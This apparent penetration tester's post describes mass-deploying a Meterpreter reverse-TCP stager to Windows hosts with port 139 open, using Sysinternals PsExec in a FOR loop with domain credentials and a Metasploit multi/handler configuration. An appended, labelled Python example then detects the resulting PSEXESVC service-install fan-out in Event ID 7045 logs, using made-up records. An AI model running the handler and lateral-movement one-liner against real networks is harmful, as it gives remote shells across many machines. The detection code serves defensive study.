My client has closed all but port 139 of the NetBIOS ports, preventing me from using Metasploit's PSEXEC module. But Mark Russinovich's version from Microsoft will work just as well, albeit a hell of a lot slower.
Prep your loader following the instructions at https://github.com/rsmudge/metasploit-loader
Nmap for every host with port 139 open and drop those addresses into a file. Set up your handler. I use this with good success:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4455
set LHOST IPADDRESS
set EnableStageEncoding true
set AutoRunScript post/windows/manage/migrate
exploit -j -z
Download the original PSEXEC from Microsoft and run the following Windows script one-liner:
FOR /F %A IN (139.txt) DO psexec -s -u DOMAIN\user -p PASSWORD \\%A \\10.41.54.96\Share\stage.exe
If you want to use this in a batch file, double up on the % for the variables, like FOR /F %%A IN…
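The loop above leaves a clear trace on every target: Sysinternals PsExec installs a service (Event ID 7045 in the System log, default name PSEXESVC) on each host it touches, so one account installing that service on many hosts within seconds is the detection counterpart of this one-liner. The following is an added example, not part of the original post, that flags that fan-out over constructed event records (all hostnames, accounts and times are made up):

```python
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# Constructed sample of Event ID 7045 ("A service was installed in the system")
# records collected from several hosts' System logs, flattened to dicts.
EVENTS_7045 = [
    {"host": "WS01", "time": "2024-03-04T10:00:01", "user": "CORP\\svc-backup",
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "WS02", "time": "2024-03-04T10:00:09", "user": "CORP\\svc-backup",
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "WS03", "time": "2024-03-04T10:00:18", "user": "CORP\\svc-backup",
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "WS04", "time": "2024-03-04T10:00:27", "user": "CORP\\svc-backup",
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    # Benign: an agent upgrade installing its own service on a single host.
    {"host": "WS05", "time": "2024-03-04T10:01:00", "user": "NT AUTHORITY\\SYSTEM",
     "service": "EdrSensor", "image": r"C:\Program Files\EDR\sensor.exe"},
    # A lone admin PsExec session hours earlier: PsExec, but not a fan-out.
    {"host": "SRV01", "time": "2024-03-04T02:15:00", "user": "CORP\\jdoe",
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
]

def is_psexec_service(event):
    """True if the installed service looks like PsExec's default service.
    (PsExec's -r switch renames it, so the image path is checked as well.)"""
    name = event["service"].upper()
    image = ntpath.basename(event["image"]).upper()
    return name == "PSEXESVC" or image == "PSEXESVC.EXE"

def find_psexec_fanout(events, window=timedelta(minutes=5), min_hosts=3):
    """Return {user: [hosts]} for accounts that installed the PsExec service on
    at least min_hosts distinct hosts inside a sliding window of length `window`."""
    by_user = defaultdict(list)
    for e in events:
        if is_psexec_service(e):
            by_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["host"]))
    hits = {}
    for user, installs in by_user.items():
        installs.sort()  # chronological, so each window starts at installs[i]
        for i, (start, _) in enumerate(installs):
            hosts = {h for t, h in installs[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                hits[user] = sorted(hosts)
                break
    return hits

if __name__ == "__main__":
    for user, hosts in find_psexec_fanout(EVENTS_7045).items():
        print(f"PsExec fan-out by {user}: {', '.join(hosts)}")
```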